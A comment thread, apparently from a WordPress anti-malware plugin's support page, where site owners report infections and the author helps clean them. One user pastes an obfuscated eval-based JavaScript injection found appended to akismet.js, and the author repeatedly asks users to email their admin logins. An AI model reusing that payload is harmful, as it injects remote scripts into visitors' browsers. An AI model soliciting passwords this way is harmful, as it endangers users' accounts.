    On July 2, 2013 at 8:41 am, WAYNE STOCKS said:

    Something has infected all of my plugins on different sites. I am trying to run your plugin (which I resintalled) and I am getting the message

    “Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.
    This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
    Consider disabling caching and compression plugins (at least during the scanning process).”

    I don’t have any plugins running (as a result of the virus), so I can’t figure out how to fix the issue with the output buffers. Any ideas? Right now it has checked 25 folders in 18 minutes with 4,407 folders left to go.

    Reply
    • Anti-Malware Admin
      On July 2, 2013 at 8:53 am, Anti-Malware Admin said:

      eva1fY2bak1cV2ir sound like a malicious function that was hacked into your site to inject redirects or ads into the output of your pages. It is probably embedded in your theme or one one of the core WordPress files. It may also be encoded so that you cannot easily search for it or tell what it’s doing with your output.

      It’s obviously affecting the speed of you site if it’s taking that long to scan. If my plugin does not find it when the scan finally finishes then you can send me your WP Admin login and I’ll look for it for you.

      Reply
  • tc0nn
    On June 18, 2013 at 9:32 am, tc0nn said:

    You misspelled “handle”:

    Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.

    Reply
    • Anti-Malware Admin
      On June 18, 2013 at 9:56 am, Anti-Malware Admin said:

      Thanks for pointing that out. That message has been misspelled this whole time and I didn’t notice and nobody else has said anything until now. I’ll have it corrected in my next release.

      Reply
  • Roger Hawk
    On June 17, 2013 at 5:45 am, Roger Hawk said:

    Hey Eli,

    I noticed that all my sites I have your plugin installed on got a message alert that the wp-content/plugins/gotmls/safe-load.php file was changed. Did you do this or are the hackers trying to defeat your plugin?

    Thanks…

    Reply
    • Anti-Malware Admin
      On June 17, 2013 at 7:43 am, Anti-Malware Admin said:

      That was me. I did upload a change to that file but did not release a new version so it shows up different.

      Reply
  • Christopher Wilkinson
    On June 15, 2013 at 4:32 pm, Christopher Wilkinson said:

    Hello Eli

    I am learning how to be a web master and have had to deal with these malware problems more and more lately. I love your anti malware program. Can I get you to look at our site and help me make sure there are no problems. This is a school website and I need to make sure the community can access this website safely.

    my site http://www.cic-caracas.org is infected by malware. i have scanned using this plugin and confirmed and said it took care of some of the treats but listed 68 potential threats. What can I do about all of those. Please tell me how to remove all those or if it is necessary.

    Thanks.

    Reply
    • Anti-Malware Admin
      On June 15, 2013 at 7:59 pm, Anti-Malware Admin said:

      I would be happy to check your site for you. Can you send me you WP Admin login?

      You can email the password info directly to: eli at gotmls dot net

      Reply
    • Anti-Malware Admin
      On June 18, 2013 at 1:21 pm, Anti-Malware Admin said:

      Thanks for sending me the login. I did find one more threat in the footer, added it to the definition update, and removed the malicious code from that file.

      Your site should be all clean now. You just need to go to your Google Webmaster Tools account and request a review in the Malware section to get rid of that warning from Google.

      Please let me know if you need anything else.

      Reply
  • Stein Brauten
    On June 10, 2013 at 3:10 am, Stein Brauten said:

    Hi Eli,

    Thank you for this great plugin! It fixed a lot of crap having entered my site, but yeasterday I got a new one. All plugins disapeared, but still in the plugin directory. I removed everything to try to re-install, had a hunch so started with Anti-Malware to run a scan and it reported:
    “Another Plugin or Theme is using ‘eva1fY2bak1cV2ir’ to hadle output buffers.
    This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
    Consider disabling caching and compression plugins (at least during the scanning process).
    What is this “eva1fY2bak1cV2ir” – and how to get rid of it??

    Br,

    Stein

    Reply
    • Anti-Malware Admin
      On June 10, 2013 at 6:53 am, Anti-Malware Admin said:

      eva1fY2bak1cV2ir is a custom function that has taken over the output buffer on your site. I cannot say exactly what it does without seeing it, but I would guess it is filtering the content of you site to display only what the hacker wants to display (or it inserts content that the hacker wants to add to your site).

      If you want to give me access to your site I will see if I can find it for you.

      Reply
  • Vicki
    On May 15, 2013 at 9:52 am, Vicki said:

    Thanks so much for the great plugin. I have an issue with some Malware on our site. Sucuri says it found Malware, but your plugin and Wordfence both say the site it clean. However, both computers I accessed the site with ended up getting infected with the “system-care antivirus” malware, so I suspect this is what Sucuri is picking up. I am not sure what my next step should be or where to look in my files for suspicious code. Any suggestions would be greatly appreciated.

    Thanks again,
    Vicki

    Reply
    • Anti-Malware Admin
      On May 15, 2013 at 10:25 am, Anti-Malware Admin said:

      If you have my latest definition update and you are scanning your whole site and it’s not finding anything then you may have a new virus that I have not yet identified. These threats are alway evolving and adapting to avoid detection. Would you be willing to provide me with WP Admin access to your site? Then I can find it and update my definitions update so that it can be automatically repaired by my plugin.

      Reply
  • Damir Kropf
    On May 4, 2013 at 1:12 am, Damir Kropf said:

    Error message disappeared … seems that everything is OK afterall. Thanks!

    Damir

    Reply
    • Anti-Malware Admin
      On May 4, 2013 at 6:05 am, Anti-Malware Admin said:

      Sometimes it take a little while for Google to review your site and notice that it has been cleaned. For future reference, you can speed that process up by requesting a review in the Health section of Google’s Webmaster Tools.

      Reply
  • location voiture agadir
    On April 26, 2013 at 2:41 pm, location voiture agadir said:

    The plugin detect a normal code and say : Found 1 WP-Login Exploit

    <?php
    /**
    * WordPress User Page
    *
    * Handles authentication, registering, resetting passwords, forgot password,
    * and other user handling.
    *
    * @package WordPress
    */

    /** Make sure that the WordPress bootstrap has run before continuing. */
    require( dirname(__FILE__) . '/wp-load.php' );

    ———

    is that a bug?
    thanks

    Reply
    • Anti-Malware Admin
      On April 26, 2013 at 3:33 pm, Anti-Malware Admin said:

      Thanks for asking this question. No, it is not a but?

      It is, as you say, normal code.
      It is the essentially the first line of code in every wp-login.php in every install of WordPress.
      It is also extremely vulnerable to a brute-force attack.

      Basically, if that wp-load.php file is included without certain protection, it can bring down your whole server. My plugin now has a patch for this file that stops the WordPress bootstrap from loading if it senses a brute-force attack. This was inspired by the wide-spread brute-force attacks that have been targeting WordPress login pages around the world for the past few weeks. These attacks have crippled servers and probably succeeded in stealing some passwords too. So my plugin looks for the absence of my patch and , if not found, classifies this file as Exploitable. Select this file to be fixed will automatically apply my patch, in much the same way as it patches older versions of timthumb.php that can be exploited to write malicious code to files on your server.

      I hope this suitably explains why it is highlighting this “normal” part of any WordPress installation. Please feel free to contact me again, should you need any further explanation or assistance.

      Reply
      • Roger Hawk
        On April 28, 2013 at 5:32 am, Roger Hawk said:

        That explains why I thought this was coming up with a false positive. I see where some people were having issues logging back in after applying the fix. Is that fixed now? I don’t want to apply the patch and then not be able to log back in.

        Also, I have a couple of files that are written with an eval Base_64 statement in them. I sent the potential virus file to the creator of the plugin and asked if the code (machine code I couldn’t decode) was legitimate. They said it was legit.

        My question is how do we mark a file as not a virus after using your plugin?

        Thanks again Eli for everything.

        Reply
        • Anti-Malware Admin
          On April 28, 2013 at 6:56 am, Anti-Malware Admin said:

          There were a few people who had a problem logging in after applying the first version of this login patch. This was because there servers had register_globals turned on and WordPress destroys session vars whenever register_globals is on. I have fixed this in the current patch and it works great at stopping these brute-force attacks.

          If you have any false positives that come up because a plugin developer is trying to be sneaky or cryptic like a hacker then I can whitelist that code but only after I decrypt it and check it thoroughly to make sure it is really ok.

          Reply
        • Roger Hawk
          On April 28, 2013 at 7:29 am, Roger Hawk said:

          Great job Eli. The login script cleanse works great. Tried it on a test domain and no problems at all.

          Thanks so much.

          I’ll get you the info on those false positives. I do have a couple of coders who like to hide what they did so most people don’t steal their ideas and processes.

          Roger

          Reply
  • Jeff Dorman
    On April 20, 2013 at 5:46 am, Jeff Dorman said:

    Hi Eli. I love your plug-in! But I just upgraded to 1.3.04.17 and even though the site is registered I am getting an error message on ‘What to look for’:

    WP-Login Exploits
    Registration of your Installation Key is required for this feature

    but your Scan Setting Page also tells me:

    Your Installation Key is Registered:
    8d8f06a5f8d73d9a59ad6f993de2fac1
    http://308gts.dorman-consulting.com
    Your Definitions file is current.

    Is this normal?

    Jeff

    Reply
    • Anti-Malware Admin
      On April 20, 2013 at 6:45 am, Anti-Malware Admin said:

      I’m sorry you got conflicting information on that page. I had to disable that particular update because it was causing problems on some peoples sites. I have just released a plugin update that reolves this issue. If you download the new version 1.3.04.19 then it should work correctly.

      Please let me know if you still have any issues, Thanks.

      Reply
  • Ron Quick
    On April 19, 2013 at 10:58 am, Ron Quick said:

    Hello Eli, Just downloaded and ran your plug-in. It did find some malware and repaired on my site. Problem Is I still have an issue with my site Google is calling malware and has posted a warning. I would like to give you more info if you could look

    Thanks

    Reply
    • Anti-Malware Admin
      On April 19, 2013 at 11:14 am, Anti-Malware Admin said:

      This is a common problem for people, after removing the malware you need to have Google review your site. There is a Malware page in the Health section of Google Webmaster tools where you can request a review.

      let me know if you need any more help.

      Reply
  • Stephanie
    On April 16, 2013 at 10:35 am, Stephanie said:

    Hello,

    Malware has completely messed up the appearance of my blog. I don’t have a current backup so I’m trying desperately to restore my site without completely wiping it. I’ve run several scans from various sources and they all show different results. I’ve heard good things about your plugin so I’d love to use it but it shows no threats (but skipped about 1100 files). Am I out of luck or am I doing something wrong?

    Reply
    • Anti-Malware Admin
      On April 16, 2013 at 11:33 am, Anti-Malware Admin said:

      Your not out of luck because you just contacted the right person. You probably just have some new malware variant that I have not written a definition for yet. If you send me your WP Admin login I will get in there and find it for you, and add it to my definition update so that it can be automatically repaired.

      Reply
    • Anti-Malware Admin
      On April 19, 2013 at 12:47 pm, Anti-Malware Admin said:

      Thanks for sending me your login info, and for the tip about the analytics plugin. I found the Malicious code embeded in the main plugin file of the Google-Analyticator Plugin. I have added this new threat to my definitions update and repaired that files with my plugin. You can enable that Google-Analyticator Plugin again if you want to still use it.

      Reply
  • Jeff
    On April 15, 2013 at 12:48 pm, Jeff said:

    I just stopped by to make my monthly donation.

    Eli, keep up the good work, you’re a godsend.

    Mahalo

    Jeff

    Reply
  • Saskia Salomons
    On April 10, 2013 at 12:50 am, Saskia Salomons said:

    Hi Eli,

    Great plugin.
    Can you please help me out? My site is infected with malware.
    I have a Malware entry: MW:EXPLOITKIT:BLACKHOLE1. Can your plugin fix this entry?

    I already scanned and 5 threads where found. However, http://sitecheck.sucuri.net/results/vonkatwork.nl still shows that my site is infected.
    Thanks!

    Reply
    • Anti-Malware Admin
      On April 10, 2013 at 1:38 pm, Anti-Malware Admin said:

      Sucuri shows you are clean now.

      If you still need more help with anything send me your WP Admin login.

      Reply
  • Baldemar
    On April 1, 2013 at 8:33 am, Baldemar said:

    I got the same problem I installed the plug in and runed the scan but nothing has changed, I am still have the same problem. Here is what my antivirus warnig is telling me:
    URL:

    http://movinghouston.com/wp/buy_sell/

    Process:

    C:Program Files (x86)GoogleChromeApp…

    Infection:

    JS:Iframe-AMW [Trj]

    Reply
    • Anti-Malware Admin
      On April 1, 2013 at 11:09 am, Anti-Malware Admin said:

      Thanks for providing a login to your admin. I added that new threat to my definitions update and then my plugin was able to remove it form the two files that were infected.

      I also expaneded the search range to include the root site and it found and clean two backdoor scripts that were probably responible for planting the virus in the first place.

      You site is all clean now. Let me know if there is anything else you need.

      Reply
  • michael denigan
    On March 31, 2013 at 4:52 pm, michael denigan said:

    Hi
    I have a site bluemonkeyonline.net that is infected with malware which appears to come from bizwonk.com, as every time I load bluemonkeyonline.net, bizwonk.com appears in the lower left of the browser window. I have scanned and infected files have been located and quarantined and a number of potential threats have been found, but the site is still infected as on reload the domain bizwonk still apears. Am I doing something wrong.
    Cheers….michael

    Reply
    • Anti-Malware Admin
      On March 31, 2013 at 5:38 pm, Anti-Malware Admin said:

      It sounds like you have an iframe injection that is not being detected by me plugin. If you want to give me WP Admin accesss to you site I can find it and add it to my definitions so it can be automatically removed.

      Reply
  • Eva Brumark
    On March 25, 2013 at 12:25 am, Eva Brumark said:

    Hi Eli!

    I really need help… I’m one of several administrators for this site: http://www.bryggerietsgymnasium.se. It’s been blacklisted for a week so I decided to spend my weekend trying to solve the problems. Without success. I have installed Anti-Malware and another malware plugin and done a check with Sucuri, and I get different results everywhere. Sucuri results are that it doesn’t show any problems but still have been blacklisted by Yandex. I have updated wordpress and all plugins. Anti-Malware results refer mostly to script files (23), both in wordpress and plugins (among them the other malware plugin!). I have been able to half the problems by removing a lot of old posts but it’s more tricky when it comes to pages. The other malware plugin finds problems everywhere…. Now I’m a bit desperate. Can you please help?

    Thank you//Eva

    Reply
  • Thomas Haarr
    On March 23, 2013 at 7:15 am, Thomas Haarr said:

    I have trouble that Avast software find malware and block my site. I’ve tried almost 10 different check up software and sites that do that to find something. but doesn’t find anything. Is Avast just being stupid with my site or?

    Reply
    • Anti-Malware Admin
      On March 23, 2013 at 8:45 am, Anti-Malware Admin said:

      This is the second comment within a half hour that reports of such a problem with Avast!

      I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.

      If there is something new that has infected your site then it is certainly possible that my plugin (as well as others’) has in fact missed it.

      If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.

      Reply
  • Jesper
    On March 23, 2013 at 6:46 am, Jesper said:

    Hi, a visitor of my site discovered that his Avast! flagged it as containing malware. This plugin doesnt recognize any threats when I scanned through the files. Should I not worry or might there be something that this plugin cannot find?

    Reply
    • Anti-Malware Admin
      On March 23, 2013 at 8:37 am, Anti-Malware Admin said:

      Your’s is one of two comments within a half hour of each other that highlight such a report about Avast!

      I do not see any signs of infection on either site. So, this is either a very new/undetected virus that Avast has found, or something on both sites is giving off false positives to Avast.

      If there is something new that has infected your site then it is certainly possible that my plugin (as well as others’) has in fact missed it.

      If you can come up with any details about this infection that might help me identify it I would be happy to take a closer look.

      Reply
  • Roger Hawk
    On March 15, 2013 at 1:06 pm, Roger Hawk said:

    I just registered the first domain and wanted to run a scan to see if it does as advertised. if it does, I too want to be able to protect all my domains under two email addresses. I have one for my personal use and one that is a reseller account I put my clients sites in.

    Cheers,

    Reply
    • Anti-Malware Admin
      On March 15, 2013 at 1:15 pm, Anti-Malware Admin said:

      That sounds like a good plan. Do you have any infected site you are trying to get clean?

      Let me know if I can be of any assistance.

      Reply
  • Richard Lucas
    On March 6, 2013 at 10:03 pm, Richard Lucas said:

    So far I have used the scanner on three of my sites. Each time they found 2 known threats. When I clicked auto fix, it would fix one of the files, but not the other. What should I do next. Can I actually delete that file from the directory or no? Thanks for your help.

    Reply
    • Anti-Malware Admin
      On March 7, 2013 at 8:06 am, Anti-Malware Admin said:

      I would not delete the file unless you are sure it is not needed for your site to function. Usually these types of infections are just one line of malicious code that is injected into a core file that your site was already using and deleting that file will break your site. The trick is to remove the malicious code while preserving the integrity of the rest of the file. That said, there are sometime files that are all bad and no good and not needed at all which you can delete but knowing the difference if the key. If my plugin cannot remove that second threat then it is probably due to the permissions on that file.

      If you want I can take a look at and fix it for you and give you more info. You can send login credentials directly to my email if you want me to check it out: eli at gotmls dot net

      Reply
  • Marketing Admin
    On March 5, 2013 at 1:15 pm, Marketing Admin said:

    I was pretty psyched to discover your plug-in, installed it, started to run it when it appeared to get hung up. I logged out and now I have this error:

    Fatal error: Unknown: Failed opening required ‘/data/26/2/24/8/2513008/user/2752766/cgi-bin/.php/sessions/sess_d46e1d1d9b1761f304069089014695a6′ (include_path=’.:/usr/services/vux/lib/php’) in Unknown on line 0

    I am very sad.

    Reply
    • Anti-Malware Admin
      On March 12, 2013 at 5:40 am, Anti-Malware Admin said:

      I just wanted to follow up from last week, and say thank for providing the WP Admin and FTP logins I needed to get you issue resolved.

      How has your site running? It looks like it has stayed clean but I see it is still blacklisted on Google. You need to go to Google’s Webmaster tools and request a review to clear that warning. Let me know if you need help with that.

      Also, it looks like there are still vulnerable timthumb.php files in the themes of two other sites on your server. These are not viruses but they are still exploitable and could lead to another infection. My plugin can scan all the sites on your server at once and automatically upgrade those timthumb files to patch that vulnerability.

      Please let me know if can be of any further assistance.

      Reply
  • Todd Kevitch
    On February 14, 2013 at 1:43 pm, Todd Kevitch said:

    Great product – just made a donation. Do you have any simple suggestions for new WordPress blogs to prevent malware, etc. I read somewhere to change categories and to make difficult passwords but I couldn’t find the article again.

    Reply
    • Anti-Malware Admin
      On February 14, 2013 at 4:39 pm, Anti-Malware Admin said:

      There is no golden solution to this general problem, but usually keeping WordPress up-to-date and making sure the theme and plugins you are using do not have any known vulnerabilities is a good start. It is also a good idea to run regular scans for mal-ware. I am working on a cron engine for scheduling automatic scan which will help with that.
      I have never hear anything about changing categories but it couldn’t hurt to have strong passwords (but these kinds of hacks usually don’t need to use your password to get in).

      Thanks for your donation. The more support I get, the more I can support this plugin and make it better and stronger against a wider variety of threats and vulnerabilities.

      Reply
  • Asfihani Asfik
    On February 12, 2013 at 1:07 am, Asfihani Asfik said:

    Hi Eli,

    Awesome plugin and keep the good work. Anyway, any chance to prevent the logo displayed in the menu links, I mean just like another plugins :) . Thanks again.

    Reply
    • Anti-Malware Admin
      On February 12, 2013 at 7:18 am, Anti-Malware Admin said:

      I think you are asking if it is possible to not show the Anti-Malware menu item.
      If so you may want to look on the bottom-right of the Scan Settings page and change the “Menu Item Placement Options” setting to “Sub-Menu inside the Tools Menu Item”.
      If that is not what you are looking for then please try me again and I’ll see what I can do to help.

      Reply
  • sunny tewathia
    On February 8, 2013 at 2:02 am, sunny tewathia said:

    I will definitely look forward to donation, if you really helped me out. As i wasted my money into SiteLock service, i have requested the refund after getting it i will donate the same amount to you…
    Please help me ASAP.

    Reply
    • Anti-Malware Admin
      On February 8, 2013 at 7:13 am, Anti-Malware Admin said:

      I can help you now but I will need you WP Admin login to scan for this threat. When I find it I will add it to the definition update and it can then be removed automatially. Please send login credentials to eli at gotmls dot net or reply to this notification.

      Reply
  • Christopher Shaw
    On February 1, 2013 at 2:35 pm, Christopher Shaw said:

    Hello, I just downloaded your plugin and my website mobile version seems to be redirecting to a russian model website. Can your plug in fix this malware problem? We are more then happy to donate if it can.

    Reply
    • Anti-Malware Admin
      On February 1, 2013 at 2:42 pm, Anti-Malware Admin said:

      It should find it and mark it as a Known Threat at which point you can click Automatically Repair to fix it.

      If it does not find it, or it only find Potential Threats, then I can help you locate the source of the infection and write a new definition so that it can be automatically removed.

      Please let me know if you need further help. You email your WP Admin credentials to eli at gotmls dot net if you want my direct help.

      Reply
  • Lee Boone
    On January 30, 2013 at 6:46 am, Lee Boone said:

    Is it possible to register more than one site, or do I need to create a different user profile for each site I’d like to scan?

    Reply
    • Anti-Malware Admin
      On January 30, 2013 at 7:08 am, Anti-Malware Admin said:

      If you use the same email address when registering the other sites then they will all fall under the same registration. If you have already registered some under other email addresses you can login to those accounts and transfer those domains you have already registered to your preferred email account.

      Reply
  • Jan De Joya
    On January 22, 2013 at 8:31 am, Jan De Joya said:

    Hi Eli,

    I ran a scan with your plugin, it found 2 security vulnerabilities in htaccess. Clicked repair, and then got 500 internal server error… now my site is down, can you help?

    Reply
    • Anti-Malware Admin
      On January 23, 2013 at 8:28 am, Anti-Malware Admin said:

      It looks like sucuri already removed some injected code from those htaccess files. My plugin had found some remaining code left in pieces in those files and when it tried to remove the last few pieces of code it broke the file. This would not have happened if my plugin had scanned these htaccess files before sucuri modified them (when the whole malicious redirect code was intact) or if sucuri had removed all the injected code when they cleaned the file, but at least we know how it happened and I can try to accommodate this sort of thing in the future.

      Thanks for giving me the chance to look at it all on your server. Please feel free to contact me if you need more help.

      Reply
  • Craig Lambie
    On January 20, 2013 at 6:58 pm, Craig Lambie said:

    Hey Eli,
    Great plugin, I am impressed so far at it finding some malicious scripts, but it reports this one as a potential threat, when I am pretty sure it is a threat :)
    Basically everything from “var _0x4470=” onwards has been appended by a hacker/ malicious script.

    Thanks

    [script akismet.js]
    jQuery(document).ready(function () {
    jQuery(‘.akismet-status’).each(function () {
    var thisId = jQuery(this).attr(‘commentid’);
    jQuery(this).prependTo(‘#comment-’ + thisId + ‘ .column-comment div:first-child’);
    });
    jQuery(‘.akismet-user-comment-count’).each(function () {
    var thisId = jQuery(this).attr(‘commentid’);
    jQuery(this).insertAfter(‘#comment-’ + thisId + ‘ .author strong:first’).show();
    });
    });

    var _0x4470=["x39x3Dx31x2Ex64x28x27x35x27x29x3Bx62x28x21x39x29x7Bx38x3Dx31x2Ex6Ax3Bx34x3Dx36x28x31x2Ex69x29x3Bx37x3Dx36x28x67x2Ex6Bx29x3Bx61x20x32x3Dx31x2Ex65x28x27x63x27x29x3Bx32x2Ex66x3Dx27x35x27x3Bx32x2Ex68x3Dx27x77x3Ax2Fx2Fx74x2Ex75x2Ex6Cx2Ex76x2Fx73x2Ex72x3Fx71x3Dx27x2Bx34x2Bx27x26x6Dx3Dx27x2Bx38x2Bx27x26x6Ex3Dx27x2Bx37x3Bx61x20x33x3Dx31x2Ex6Fx28x27x33x27x29x5Bx30x5Dx3Bx33x2Ex70x28x32x29x7D","x7C","x73x70x6Cx69x74","x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx6Ax73x7Cx68x65x61x64x7Cx68x67x68x6Ax68x6Ax68x6Ax67x7Cx64x67x6Cx6Cx68x67x75x6Bx7Cx65x73x63x61x70x65x7Cx75x67x6Bx6Bx6Ax6Bx6Ax7Cx68x67x68x6Ax67x68x6Ax68x6Ax67x6Ax68x7Cx65x6Cx65x6Dx65x6Ex74x7Cx76x61x72x7Cx69x66x7Cx73x63x72x69x70x74x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64x7Cx63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x7Cx69x64x7Cx6Ex61x76x69x67x61x74x6Fx72x7Cx73x72x63x7Cx72x65x66x65x72x72x65x72x7Cx6Cx6Fx63x61x74x69x6Fx6Ex7Cx75x73x65x72x41x67x65x6Ex74x7Cx32x31x36x7Cx6Cx63x7Cx75x61x7Cx67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65x7Cx61x70x70x65x6Ex64x43x68x69x6Cx64x7Cx72x65x66x7Cx70x68x70x7Cx7Cx39x31x7Cx31x39x36x7Cx36x34x7Cx68x74x74x70","x72x65x70x6Cx61x63x65","","x5Cx77x2B","x5Cx62","x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3–){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3–){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

    Reply
    • Anti-Malware Admin
      On January 20, 2013 at 8:21 pm, Anti-Malware Admin said:

      Thanks for reporting this. I does indeed look malicious. I will define it now and add it as a Known Threat so that it may be automatically repaired.

      Reply
    • Eli Scheetz
      On January 20, 2013 at 10:03 pm, Eli Scheetz said:

      I just updated the definitions. Can you do the download the update and scan it again? It should now mark this threat as “Known” and give you the option to “Automatically Repair”.

      Please let me know how it works for you. Thanks!

      Reply
      • Craig Lambie
        On January 23, 2013 at 6:21 pm, Craig Lambie said:

        Hey Eli,
        Thanks for the reply, and diligently adding to the definitions.
        I have removed these manually, so haven’t been able to successfully get them to be removed with the scanner yet, but hopefully I will soon… well hopefully not actually, but you know what I mean.
        I was thinking it would be good to be able to submit potential threat files to the definition too, so that jw player for example (a common plugin) isn’t caught everytime as it has an eval() in it…. that is apparently legit…?
        I would be happy to submit my scripts to you from plugins… or just the links to plugins with eval() in their scripts, and you could then get the original for your definition and compare?
        Thanks again.
        C

        Reply
        • Anti-Malware Admin
          On January 25, 2013 at 12:12 am, Anti-Malware Admin said:

          Thanks. I understand. I have not had the time I need to go through and exempt all the legit uses of eval and the like. I do have a method for white-listing benign code that would otherwise come up as a potential threat but it will take some time for me to go through and list all the exceptions properly without allowing loopholes for the malicious code.

          Reply
  • Brian Roberts
    On January 6, 2013 at 6:44 am, Brian Roberts said:

    I’ve registered and donated to your site but can no longer login to my wordpress admin page.

    When I tried to update the definitions from the wordpress plugin section nothing happened (the rest of the registration section was in green).

    Can you help please?

    Reply
    • Anti-Malware Admin
      On January 6, 2013 at 7:38 am, Anti-Malware Admin said:

      I would be happy to help. If you want to give me your WP Admin credentials I can login and try it.

      Reply
  • Heru Prasetyono
    On January 3, 2013 at 12:42 am, Heru Prasetyono said:

    I am sorry I havenot made any donation yet. I just started trying the service you give. I have a problem that I can not solve yet. There is “Found the document has moved here” note on the top left corner of my blog page. I think this is a malware or a kind of virus. I try to scan all the plugins, wp content and html but this software plugin seems does not workl
    Please help me this malware is very disturbing and dangerous for my web blog and my computer.
    I am looking forward to your support and help. Please…

    Best regards

    Reply
    • Anti-Malware Admin
      On January 4, 2013 at 9:12 am, Anti-Malware Admin said:

      I’m willing to help you find this bug if you can give me your WP Admin credentials.

      Reply
      • Myles
        On January 11, 2013 at 7:02 am, Myles said:

        did you ever find this problem? I have it too :(

        Reply
        • Anti-Malware Admin
          On January 11, 2013 at 10:08 am, Anti-Malware Admin said:

          Heru never responded to me. If you are willing to give me access to you WP Admin then I will track this down for you, and add it to my definitions so that it can be automatically removed.

          Reply
          • Myles
            On January 11, 2013 at 2:46 pm, Myles said:

            I found the problem. If you are logged into WordPress go to Appearance>Editor> on the right hand side click on “Theme Functions” (functions.php) > “click ctrl f” on your keyboard to bring up the search tab on the upper right hand side of your panel > search for smuss.net (or whatever website the “here” link brings you too.) I’m talking about the “here” link that we are trying to get rid of on our pages> The search will bring you to a URL. Mine brought me to “http://smuss.net/jquery-1.6.3.min.js” > delete the entire URL between the “” but leave the “” and update the page. Then the problem will be fixed.

            If you are not logged into wordpress extract your theme in a folder > open the theme folder > right click on functions.php > open file with notepad > scroll to the bottom of the page > look about 15 lines up for the URL and delete it > click “save” under “file” in the menu > close the notepad. Then the problem will be fixed. If you do not see the URL near the bottom (aprox 15 lines up) then you will have to search for it in this file and delete it.

            This took me awhile today to track down and fix so I hope this helps someone else other than me :)

  • Jarrod Bassin
    On December 30, 2012 at 8:25 am, Jarrod Bassin said:

    I just downloaded and installed the plugin. Sucuri.net scans have revealed multiple malware threats whereas the MLS plugin does not seem to find these threats. Also, when I run a scan on the publc_html, the scan seems to be running for several minutes and then it just stops. All the while, the percent complete indicator remains at zero. Any idea what might be happening?

    Reply
    • Anti-Malware Admin
      On December 31, 2012 at 12:22 am, Anti-Malware Admin said:

      Thanks for providing WP Admin credentials to your site. I was able to figure out why is was not finishing the scan. First, it looks like you’ve got 20+ domains installed under the main site’s public_html directory, so the Quick Scan is not an viable option. Second, you have at least one symbolic link to the public_html directory inside the public_html directory, this causes infinite recursion when drilling down through the directory structure (in order to understand recursion you must first understand recursion) ;-)
      I have added the public_html directory to the exclude path so that it will not be followed a second time through. I also add the wp-snapshots directory to the exclude path just to save time. It will now scan over 5,500 folders including all those other domains but it will take some time to do a Complete Scan.

      Reply
  • Jeff
    On December 15, 2012 at 12:38 pm, Jeff said:

    Eli is AMAZING.

    I reached out to him with a malware problem on one of my sites and an hour later he was in it searching for the culprit. 30 minutes later problem solved and a plugin update on the way.

    Where do you get this kind of customer service for a free plugin? As I said AMAZING!

    Eli you have a fan, a friend and a donor for life.

    Mahalo

    Jeff

    Reply
  • Glenn Pelupessy
    On December 15, 2012 at 12:11 pm, Glenn Pelupessy said:

    I want to skip some files, but I can’t edit ‘Skip files with the following extentions’. If I remove the standardextentions ‘png,jpg,jpeg,gif,bmp,tif,tiff,exe,zip,pdf’ the plugin still scans these extentions. Please help.

    Reply
    • Anti-Malware Admin
      On January 5, 2013 at 6:30 pm, Anti-Malware Admin said:

      You will want to skip any binary files as they are generally larger then ascii files and do not contain any scripts. I had designed it so that you could not completely clear this field, assuming that you would always need to exclude something. I have, however, fixed it so that you can now clear this field and scan all files. Keep in mind it will likely be a waste of time to scan binary files for malicious text patterns.

      Reply
  • Silvano Ginepri
    On October 14, 2012 at 7:34 am, Silvano Ginepri said:

    Hi there
    my site crashed twice now during the scan-<i still have 2 alerts.What could be the cause. Before I deactivate the plugin I would like know what you suggest
    Silgin

    Reply
    • Anti-Malware Admin
      On October 14, 2012 at 12:21 pm, Anti-Malware Admin said:

      These 2 “Alerts” you are talking about are from Sucuri.net and they are cached from 2 days ago. I just had Sucuri refresh their cache by clicking “Re-Scan” on their site and the results confirmed that your site is now clean.

      Reply
  • Firat Öztürk
    On October 10, 2012 at 12:34 am, Firat Öztürk said:

    i got something like this

    “Warning: set_time_limit() has been disabled for security reasons in…”

    What should i do? Is this a problem or just an unimportant info?

    Thanks

    Reply
    • Anti-Malware Admin
      On October 10, 2012 at 6:49 am, Anti-Malware Admin said:

      It’s not something to worry about. I am setting the timeout to 60 seconds in a recursive loop so that it does not get stock in some part of that scan process. Your server’s security settings seem to be stopping me from setting that value.
      I will suppress this error in my next release by changing set_time_limit to @set_time_limit. You can add the @ to your version if you want to suppress these errors now.

      Reply
  • Lane Lester
    On September 27, 2012 at 5:32 am, Lane Lester said:

    The plugin says my number is not registered, but your site says it is. I’ve logged on with the password you supplied. I’ve reloaded the plugin page, but no change.

    Lane

    Reply
    • Anti-Malware Admin
      On September 27, 2012 at 5:53 am, Anti-Malware Admin said:

      Somehow your site was registered in my database without a trailing ‘/’ (slash). I have corrected this error in my database so it should work for you now.

      Thanks for contacting me about this issue. Please let me know if there is anything else I can do.

      Reply
      • Lane Lester
        On September 27, 2012 at 6:40 am, Lane Lester said:

        Thanks, that seems to have fixed it. It doesn’t say I’m registered, but at least it no longer says I’m not!

        The search for updates, plugin and definitions is taking forever, but maybe your server is overloaded.

